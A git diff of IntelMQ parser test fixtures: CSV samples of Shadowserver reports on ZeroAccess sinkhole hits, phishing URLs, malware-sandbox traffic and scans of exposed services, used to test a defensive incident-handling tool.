-"2016-08-30 00:01:17","198.51.100.29",31334,"DE",,"b68-zeroaccess-2-32bit",,,1038,,,,16464,,,,,,"198.51.100.0",8075,"HK",0,0,,,,,,
-"2016-08-30 00:01:17","198.51.100.143",3320,"DE",,"b68-zeroaccess-2-32bit",,,65070,,,,16464,,,,,,"198.51.100.10",60781,"NL",541690,874899,,,,,,
-"2016-08-30 00:01:18","198.51.100.206",12312,"DE",,"b68-zeroaccess-2-32bit",,,57157,,,,16464,,,,,,"198.51.100.76",60781,"NL",0,0,,,,,,
-"2016-08-30 00:01:18","198.51.100.199",6805,"DE",,"b68-zeroaccess-2-64bit",,,53305,,,,16465,,,,,,"198.51.100.138",8075,"US",0,0,,,,,,
-"2016-08-30 00:01:23","198.51.100.30",6830,"DE",,"b68-zeroaccess-2-32bit",,,16490,,,,16464,,,,,,"198.51.100.158",8075,"HK",0,0,,,,,,
-"2016-08-30 00:01:23","198.51.100.16",3209,"DE",,"b68-zeroaccess-1-32bit",,,58110,,,,16471,,,,,,"198.51.100.61",8075,"IE",518210,737415,,,,,,
-"2016-08-30 00:01:23","198.51.100.108",9145,"DE",,"b68-zeroaccess-1-32bit",,,1033,,,,16471,,,,,,"198.51.100.56",8075,"IE",0,0,,,,,,
-"2016-08-30 00:01:23","198.51.100.62",31334,"DE",,"b68-zeroaccess-1-32bit",,,54135,,,,16471,,,,,,"198.51.100.96",8075,"IE",0,0,,,,,,
-"2016-08-30 00:01:24","198.51.100.53",58243,"DE",,"b68-zeroaccess-1-32bit",,,62568,,,,16471,,,,,,"198.51.100.150",8075,"US",0,0,,,,,,
-"2016-08-30 00:01:24","198.51.100.69",9145,"DE",,"b68-zeroaccess-2-32bit",,,1032,,,,16464,,,,,,"198.51.100.89",8075,"IE",0,0,,,,,,
-"2016-08-30 00:01:28","198.51.100.17",3320,"DE",,"b68-zeroaccess-1-32bit",,,49152,,,,16471,,,,,,"198.51.100.8",8075,"IE",541690,874899,,,,,,
-"2016-08-30 00:01:32","198.51.100.94",3320,"DE",,"b68-zeroaccess-2-32bit",,,49160,,,,16464,,,,,,"198.51.100.244",8075,"SG",541690,874899,,,,,,
-"2016-08-30 00:01:35","198.51.100.145",3320,"DE",,"b68-zeroaccess-2-32bit",,,1036,,,,16464,,,,,,"198.51.100.228",8075,"HK",541690,874899,,,,,,
-"2016-08-30 00:01:36","198.51.100.235",3320,"DE",,"b68-zeroaccess-2-32bit",,,35575,,,,16464,,,,,,"198.51.100.209",8075,"US",541690,874899,,,,,,
-"2016-08-30 00:01:40","198.51.100.106",3209,"DE",,"b68-zeroaccess-1-64bit",,,49152,,,,16470,,,,,,"198.51.100.177",8075,"US",0,0,,,,,,
-"2016-08-30 00:01:51","198.51.100.162",3320,"DE",,"b68-zeroaccess-2-32bit",,,1027,,,,16464,,,,,,"198.51.100.208",60781,"NL",541690,874899,,,,,,
-"2016-08-30 00:01:54","198.51.100.8",8881,"DE",,"b68-zeroaccess-1-32bit",,,50541,,,,16471,,,,,,"198.51.100.86",8075,"US",0,0,,,,,,
-"2016-08-30 00:01:58","198.51.100.250",3320,"DE",,"b68-zeroaccess-2-32bit",,,60675,,,,16464,,,,,,"198.51.100.139",8075,"US",541690,874899,,,,,,
-"2016-08-30 00:02:00","198.51.100.224",3320,"DE",,"b68-zeroaccess-2-32bit",,,1039,,,,16464,,,,,,"198.51.100.144",60781,"NL",541690,874899,,,,,,
-"2016-08-30 00:02:12","198.51.100.70",6805,"DE",,"b68-zeroaccess-1-64bit",,,49152,,,,16470,,,,,,"198.51.100.189",8075,"US",0,0,,,,,,
-"2016-08-30 00:02:12","198.51.100.119",3209,"DE",,"b68-zeroaccess-2-32bit",,,60183,,,,16464,,,,,,"198.51.100.227",8075,"HK",0,0,,,,,,
-"2016-08-30 00:02:15","198.51.100.194",3320,"DE",,"b68-zeroaccess-2-64bit",,,58025,,,,16465,,,,,,"198.51.100.96",8075,"SG",541690,874899,,,,,,
-"2016-08-30 00:02:16","198.51.100.43",6830,"DE",,"b68-zeroaccess-2-32bit",,,1031,,,,16464,,,,,,"198.51.100.206",8075,"SG",0,0,,,,,,
-"2016-08-30 00:02:16","198.51.100.92",31334,"DE",,"b68-zeroaccess-1-32bit",,,63715,,,,16471,,,,,,"198.51.100.214",60781,"NL",0,0,,,,,,
-"2016-08-30 00:02:18","198.51.100.247",8220,"DE",,"b68-zeroaccess-2-64bit",,,51420,,,,16465,,,,,,"198.51.100.196",8075,"HK",518210,737415,,,,,,
-"2016-08-30 00:02:18","198.51.100.213",3320,"DE",,"b68-zeroaccess-2-32bit",,,50331,,,,16464,,,,,,"198.51.100.125",60781,"NL",541690,874899,,,,,,
-"2016-08-30 00:02:21","198.51.100.7",35776,"DE",,"b68-zeroaccess-1-32bit",,,62063,,,,16471,,,,,,"198.51.100.161",8075,"US",0,0,,,,,,
-"2016-08-30 00:02:22","198.51.100.145",31334,"DE",,"b68-zeroaccess-1-32bit",,,1069,,,,16471,,,,,,"198.51.100.191",8075,"IE",0,0,,,,,,
-"2016-08-30 00:02:29","198.51.100.77",3320,"DE",,"b68-zeroaccess-2-64bit",,,52331,,,,16465,,,,,,"198.51.100.206",8075,"HK",541690,874899,,,,,,
-"2016-08-30 00:02:39","198.51.100.77",3209,"DE",,"b68-zeroaccess-2-32bit",,,1056,,,,16464,,,,,,"198.51.100.245",8075,"HK",0,0,,,,,,
-"2016-08-30 00:02:46","198.51.100.64",3209,"DE",,"b68-zeroaccess-2-64bit",,,59606,,,,16465,,,,,,"198.51.100.127",8075,"SG",0,0,,,,,,
-"2016-08-30 00:02:47","198.51.100.127",3320,"DE",,"b68-zeroaccess-1-32bit",,,1027,,,,16471,,,,,,"198.51.100.156",8075,"SG",541690,874899,,,,,,
-"2016-08-30 00:03:15","198.51.100.156",3320,"DE",,"b68-zeroaccess-2-32bit",,,1071,,,,16464,,,,,,"198.51.100.46",8075,"SG",541690,874899,,,,,,
-"2016-08-30 00:03:15","198.51.100.57",3320,"DE",,"b68-zeroaccess-2-32bit",,,59743,,,,16464,,,,,,"198.51.100.9",8075,"HK",541690,874899,,,,,,
-"2016-08-30 00:03:15","198.51.100.86",6830,"DE",,"b68-zeroaccess-2-64bit",,,9205,,,,16465,,,,,,"198.51.100.31",8075,"HK",0,0,,,,,,
-"2016-08-30 00:03:16","198.51.100.169",3320,"DE",,"b68-zeroaccess-2-32bit",,,1067,,,,16464,,,,,,"198.51.100.200",8075,"SG",541690,874899,,,,,,
-"2016-08-30 00:03:16","198.51.100.104",6805,"DE",,"b68-zeroaccess-1-64bit",,,49152,,,,16470,,,,,,"198.51.100.121",8075,"SG",0,0,,,,,,
-"2016-08-30 00:03:17","198.51.100.183",6805,"DE",,"b68-zeroaccess-2-32bit",,,1038,,,,16464,,,,,,"198.51.100.37",8075,"US",0,0,,,,,,
-"2016-08-30 00:03:17","198.51.100.94",3209,"DE",,"b68-zeroaccess-2-32bit",,,1026,,,,16464,,,,,,"198.51.100.156",8075,"US",0,0,,,,,,
-"2016-08-30 00:03:18","198.51.100.253",8881,"DE",,"b68-zeroaccess-1-32bit",,,53844,,,,16471,,,,,,"198.51.100.52",8075,"HK",0,0,,,,,,
-"2016-08-30 00:03:21","198.51.100.203",39706,"DE",,"b68-zeroaccess-2-32bit",,,37904,,,,16464,,,,,,"198.51.100.18",8075,"HK",0,0,,,,,,
-"2016-08-30 00:03:24","198.51.100.108",6805,"DE",,"b68-zeroaccess-2-32bit",,,50628,,,,16464,,,,,,"198.51.100.125",60781,"NL",0,0,,,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/outdated_dnssec_key.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/outdated_dnssec_key.csv
deleted file mode 100644
index 3940bcfe1..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/outdated_dnssec_key.csv
+++ /dev/null
@@ -1,3 +0,0 @@
-"timestamp","ip","asn","geo","region","city","hostname","dst_ip","dst_port","dst_asn","dst_geo","naics","sic","dst_naics","dst_sic","sector","dst_sector","tag","public_source","protocol"
-"2018-10-18 00:03:50","10.10.10.10",65536,"AT","WIEN","VIENNA","example.com","10.10.10.11",53,65537,"US",0,0,0,0,"Information Technology","Information Technology","outdated-dnssec-key","verisign","udp"
-"2018-10-18 05:08:36","fe80::1",65536,"AT",,,"example.com","fe80::2",53,65537,"US",,,,,,,"outdated-dnssec-key","verisign","udp"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/phish_url.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/phish_url.csv
new file mode 100644
index 000000000..965d763a3
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/phish_url.csv
@@ -0,0 +1,4 @@
+"timestamp","url","host","ip","asn","geo","region","city","naics","sector","source"
+"2022-02-01 08:00:07","https://priceless-pare.example.net/Postal-/acec6/","priceless-pare.example.net","172.245.0.0",64512,"US","NEW YORK","BUFFALO",518210,"Communications, Service Provider, and Hosting Service","openphish.com"
+"2022-02-01 08:00:07","https://mailyahooattt.example.net/","mailyahooattt.example.net","199.34.0.0",64512,"US","CALIFORNIA","SAN FRANCISCO",,"Professional, Scientific, and Technical Services","openphish.com"
+"2022-02-01 08:00:07","https://www.example.net/viewer/vbid-730ec2b1-omsttuer","www.example.net","216.58.0.0",64512,"US","UTAH","DRAPER",519130,"Communications, Service Provider, and Hosting Service","openphish.com"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/phish_url.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/phish_url.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/phish_url.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_conn.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_conn.csv
new file mode 100644
index 000000000..4710af974
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_conn.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","asn","geo","md5","protocol","port","host","bytes_in","bytes_out"
+"2022-01-10 00:00:03","40.119.6.228",8075,"US","b575ce6dcce6502a8431db5610135c25","udp",123,"time.windows.com",0,0
+"2022-01-10 00:00:03","8.252.70.126",3356,"US","c0d947f9a8685b0d9f3efdba966389c2","tcp",80,,0,0
+"2022-01-10 00:00:03","52.109.8.22",8075,"US","c0d947f9a8685b0d9f3efdba966389c2","tcp",443,,0,0
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_conn.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_conn.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_conn.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_dns.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_dns.csv
new file mode 100644
index 000000000..697cb6209
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_dns.csv
@@ -0,0 +1,4 @@
+"timestamp","md5hash","request","type","response","family","tag","source"
+"2022-01-10 00:00:02","b575ce6dcce6502a8431db5610135c25","time.windows.com","A","40.119.6.228",,,
+"2022-01-10 00:00:08","807679198a39c80d3ca07e60fd51b581","time.windows.com","A","40.119.6.228",,,
+"2022-01-10 00:00:20","d97e973b9bf073bd3a217425259cea26","client-office365-tas.msedge.net","A","13.107.5.88",,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_dns.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_dns.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_dns.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_url.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_url.csv
new file mode 100644
index 000000000..bbfe596a2
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_url.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","asn","geo","md5","url","user_agent","host","method"
+"2022-01-10 00:01:13","23.196.47.89",20940,"US","37514b54e679a5313334e830ad780ec7","http://www.msftncsi.com/ncsi.txt","Microsoft NCSI","www.msftncsi.com","GET"
+"2022-01-10 00:01:28","72.21.81.240",15133,"US","37514b54e679a5313334e830ad780ec7","http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab","Microsoft-CryptoAPI/6.1","www.download.windowsupdate.com","GET"
+"2022-01-10 00:08:24","23.56.4.57",20940,"US","e97ea2820c0d79f3f3ca241d4dcd1060","http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl","Microsoft-CryptoAPI/6.1","crl.microsoft.com","GET"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_url.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_url.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/sandbox_url.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_adb.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_adb.csv
index be599761d..c0ff0bdf1 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_adb.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_adb.csv
@@ -1,3 +1,3 @@
-"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","name","model","device","features"
-"2018-07-26 02:07:16","36.239.124.210","tcp",5555,"36-239-124-210.dynamic-ip.hinet.net","adb",3462,"TW","TAOYUAN COUNTY","TAOYUAN CITY",518210,737415,"hlteuc","SAMSUNG-SM-N900A","hlteatt",
-"2018-07-26 02:07:16","36.236.108.107","tcp",5555,"36-236-108-107.dynamic-ip.hinet.net","adb",3462,"TW","TAIPEI CITY","TAIPEI",518210,737415,"marlin","Pixel XL","marlin","cmd,shell_v2"
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","name","model","device","features","device_vendor","device_type","device_model","device_version","device_sector"
+"2018-07-26 02:07:16","36.239.124.210","tcp",5555,"36-239-124-210.dynamic-ip.hinet.net","adb",3462,"TW","TAOYUAN COUNTY","TAOYUAN CITY",518210,737415,"hlteuc","SAMSUNG-SM-N900A","hlteatt",,,,,,
+"2018-07-26 02:07:16","36.236.108.107","tcp",5555,"36-236-108-107.dynamic-ip.hinet.net","adb",3462,"TW","TAIPEI CITY","TAIPEI",518210,737415,"marlin","Pixel XL","marlin","cmd,shell_v2",,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_amqp.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_amqp.csv
new file mode 100644
index 000000000..92f078af7
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_amqp.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","channel","message_length","class","method","version_major","version_minor","capabilities","cluster_name","platform","product","product_version","mechanisms","locales","sector"
+"2022-01-10 04:32:13","47.103.0.0","tcp",5672,,"amqp",37963,"CN","SHANGHAI SHI","SHANGHAI",518210,,0,509,10,10,0,9,"publisher_confirms,exchange_exchange_bindings,basic.nack,consumer_cancel_notify,connection.blocked,consumer_priorities,authentication_failure_close,per_consumer_qos","rabbit@iZuf63m0nnq9bwf7lhjxrkZ","Erlang/OTP","RabbitMQ","3.3.5","PLAIN AMQPLAIN","en_US",
+"2022-01-10 04:32:13","141.95.0.0","tcp",5672,,"amqp",16276,"DE","SAARLAND","SAARBRUCKEN",518210,,0,509,10,10,0,9,"publisher_confirms,exchange_exchange_bindings,basic.nack,consumer_cancel_notify,connection.blocked,consumer_priorities,authentication_failure_close,per_consumer_qos,direct_reply_to","rabbit@mtk-breizh","Erlang/OTP 24.0.3","RabbitMQ","3.8.19","AMQPLAIN PLAIN","en_US",
+"2022-01-10 04:32:13","54.234.0.0","tcp",5672,"ec2-54.234.0.0.compute-1.amazonaws.com","amqp",14618,"US","VIRGINIA","ASHBURN",454110,,0,509,10,10,0,9,"publisher_confirms,exchange_exchange_bindings,basic.nack,consumer_cancel_notify,connection.blocked,consumer_priorities,authentication_failure_close,per_consumer_qos,direct_reply_to","rabbit@1397a0e9629b","Erlang/OTP 24.2","RabbitMQ","3.9.11","PLAIN AMQPLAIN","en_US",
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_amqp.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_amqp.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_amqp.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/cisco_smart_install.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_cisco_smart_install.csv
similarity index 100%
rename from intelmq/tests/bots/parsers/shadowserver/testdata/cisco_smart_install.csv
rename to intelmq/tests/bots/parsers/shadowserver/testdata/scan_cisco_smart_install.csv
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/cisco_smart_install.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_cisco_smart_install.csv.license
similarity index 100%
rename from intelmq/tests/bots/parsers/shadowserver/testdata/cisco_smart_install.csv.license
rename to intelmq/tests/bots/parsers/shadowserver/testdata/scan_cisco_smart_install.csv.license
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_coap.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_coap.csv
index 6b3ab4b09..16fcd6826 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_coap.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_coap.csv
@@ -1,2 +1,2 @@
-"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","response"
-"2020-06-28 03:45:24","123.45.67.89","udp",5683,"some.host.com","coap",12345,"AA","REGION","CITY",518210,0,"</api>,</api/v1>,</.well-known/core>"
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","response","version"
+"2020-06-28 03:45:24","123.45.67.89","udp",5683,"some.host.com","coap",12345,"AA","REGION","CITY",518210,0,"</api>,</api/v1>,</.well-known/core>",
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_couchdb.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_couchdb.csv
new file mode 100644
index 000000000..f4074f3ed
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_couchdb.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","sector","server_version","couchdb_message","couchdb_version","git_sha","features","vendor","visible_databases","error","error_reason"
+"2010-02-10 00:00:00",192.168.0.1,tcp,5984,node01.example.com,couchdb,64512,ZZ,Region,City,0,0,,"CouchDB/1.6.1 (Erlang OTP/18)",Welcome,1.6.1,,,"Ubuntu 16.04",_replicator;_users;test;shops;god,,
+"2010-02-10 00:00:01",192.168.0.2,tcp,5984,node02.example.com,couchdb,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service","CouchDB/3.2.1 (Erlang OTP/23)",Welcome,3.2.1,244d428af,"access-ready,partitioned,pluggable-storage-engines,reshard,scheduler","The Apache Software Foundation",,,
+"2010-02-10 00:00:02",192.168.0.3,tcp,5984,node03.example.com,couchdb,64512,ZZ,Region,City,0,0,"Retail Trade","CouchDB/3.2.1 (Erlang OTP/20)",Welcome,3.2.1,244d428af,"access-ready,partitioned,pluggable-storage-engines,reshard,scheduler","The Apache Software Foundation",,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_couchdb.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_couchdb.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_couchdb.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_cwmp.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_cwmp.csv
index 393a147d8..5aebed050 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_cwmp.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_cwmp.csv
@@ -1,3 +1,3 @@
-"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","http","http_code","http_reason","content_type","connection","www_authenticate","set_cookie","server","content_length","transfer_encoding","date"
-"2019-09-04 10:44:55","198.123.245.142","tcp",30005,,"cwmp",5678,"AA","LOCATION","LOCATION",517311,0,"HTTP/1.1",200,"OK","text/html","keep-alive",,,"DNVRS-Webs",5678,,"Wed, 04 Sep 2019 07:42:37 GMT"
-"2019-09-04 11:06:50","198.123.245.162","tcp",5678,"localhost.localdomain","cwmp",5678,"AA","LOCATION","LOCATION",517311,0,"HTTP/1.1",404,"Not Found","text/html",,,,"RomPager/4.07 UPnP/1.0",,"chunked",
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","http","http_code","http_reason","content_type","connection","www_authenticate","set_cookie","server","content_length","transfer_encoding","date","sector"
+"2019-09-04 10:44:55","198.123.245.142","tcp",30005,,"cwmp",5678,"AA","LOCATION","LOCATION",517311,0,"HTTP/1.1",200,"OK","text/html","keep-alive",,,"DNVRS-Webs",5678,,"Wed, 04 Sep 2019 07:42:37 GMT",
+"2019-09-04 11:06:50","198.123.245.162","tcp",5678,"localhost.localdomain","cwmp",5678,"AA","LOCATION","LOCATION",517311,0,"HTTP/1.1",404,"Not Found","text/html",,,,"RomPager/4.07 UPnP/1.0",,"chunked",,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ddos_middlebox.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ddos_middlebox.csv
new file mode 100644
index 000000000..25e6f11d0
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ddos_middlebox.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","sector","source_port","bytes","amplification","method"
+"2010-02-10 00:00:00",192.168.0.1,tcp,80,node01.example.com,ddos-middlebox,64512,ZZ,Region,City,0,0,,49002,99,2,SYN+ACK:PSH
+"2010-02-10 00:00:01",192.168.0.2,tcp,80,node02.example.com,ddos-middlebox,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service",41200,99,2,SYN+ACK:PSH
+"2010-02-10 00:00:02",192.168.0.3,tcp,80,node03.example.com,ddos-middlebox,64512,ZZ,Region,City,0,0,,47492,99,2,SYN+ACK:PSH
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ddos_middlebox.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ddos_middlebox.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ddos_middlebox.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_docker.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_docker.csv
new file mode 100644
index 000000000..535dc4ea8
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_docker.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","version","asn","geo","region","city","naics","sic","sector","http","http_code","http_reason","content_type","server","date","experimental","api_version","arch","go_version","os","kernel_version","git_commit","min_api_version","build_time","pkg_version"
+"2010-02-10 00:00:00",192.168.0.1,tcp,2375,node01.example.com,docker,18.05.0-ce,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service",HTTP/1.1,200,OK,"application/json; charset=UTF-8","Docker/18.05.0-ce (linux)","Fri, 06 May 2022 14:06:30 GMT",false,1.37,amd64,go1.9.5,linux,3.10.0-514.26.2.el7.x86_64,f150324,1.12,2018-05-09T22:18:36.000000000+00:00,
+"2010-02-10 00:00:01",192.168.0.2,tcp,2375,node02.example.com,docker,1.13.1,64512,ZZ,Region,City,0,0,,HTTP/1.1,200,OK,application/json,"Docker/1.13.1 (linux)","Fri, 06 May 2022 14:08:07 GMT",false,1.26,amd64,go1.10.3,linux,3.10.0-693.2.2.el7.x86_64,7d71120/1.13.1,1.12,2022-03-02T15:25:43.414574467+00:00,docker-1.13.1-209.git7d71120.el7.centos.x86_64
+"2010-02-10 00:00:02",192.168.0.3,tcp,2375,node03.example.com,docker,18.05.0-ce,64512,ZZ,Region,City,0,0,,HTTP/1.1,200,OK,"application/json; charset=UTF-8","Docker/18.05.0-ce (linux)","Fri, 06 May 2022 14:08:06 GMT",false,1.37,amd64,go1.9.5,linux,3.10.0-514.26.2.el7.x86_64,f150324,1.12,2018-05-09T22:18:36.000000000+00:00,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_docker.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_docker.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_docker.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_dvr_dhcpdiscover.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_dvr_dhcpdiscover.csv
new file mode 100644
index 000000000..46ea641a6
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_dvr_dhcpdiscover.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","sector","device_vendor","device_type","device_model","device_version","device_id","device_serial","machine_name","manufacturer","method","http_port","internal_port","video_input_channels","alarm_input_channels","video_output_channels","alarm_output_channels","remote_video_input_channels","mac_address","ipv4_address","ipv4_gateway","ipv4_subnet_mask","ipv4_dhcp_enable","ipv6_address","ipv6_link_local","ipv6_gateway","ipv6_dhcp_enable"
+"2010-02-10 00:00:00",192.168.0.1,udp,37810,node01.example.com,dvrdhcpdiscover,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service",Intelbras,HDCVI,"HDCVI 1008 - Gerao 2",3.200.24.0,,BFBE29078050F,HDCVI,Intelbras,client.notifyDevInfo,9000,37777,8,0,0,0,2,58:10:8c:19:bf:fb,192.168.0.1,192.168.0.240,255.255.255.0,0,fd09:4ab5:dae9:b078::1,fe80::5a10:8cff:fe19:bffb/64,fd09:4ab5:dae9:b078::ff,1
+"2010-02-10 00:00:01",192.168.0.2,udp,37810,node02.example.com,dvrdhcpdiscover,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service",Intelbras,MHDX,"MHDX 3116",4.000.00IB002.17,,EKHH46019297F,MHDX,Intelbras,client.notifyDevInfo,80,37777,16,0,0,0,8,24:fd:0d:55:f2:32,192.168.0.2,192.168.0.240,255.255.255.0,0,fd09:4ab5:dae9:b078::2,fe80::26fd:dff:fe55:f232/64,fd09:4ab5:dae9:b078::ff,1
+"2010-02-10 00:00:02",192.168.0.3,udp,37810,node03.example.com,dvrdhcpdiscover,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service",Intelbras,MHDX,"MHDX 5216",4.000.00IB002.17,,GMII3200193FP,MHDX,Intelbras,client.notifyDevInfo,80,37777,16,0,0,0,0,d8:77:8b:b4:92:d8,192.168.0.3,192.168.0.240,255.255.255.0,0,fd09:4ab5:dae9:b078::3,fe80::da77:8bff:feb4:92d8/64,fd09:4ab5:dae9:b078::ff,1
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_dvr_dhcpdiscover.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_dvr_dhcpdiscover.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_dvr_dhcpdiscover.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ftp.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ftp.csv
index 68088b456..912e73d84 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ftp.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ftp.csv
@@ -1,3 +1,3 @@
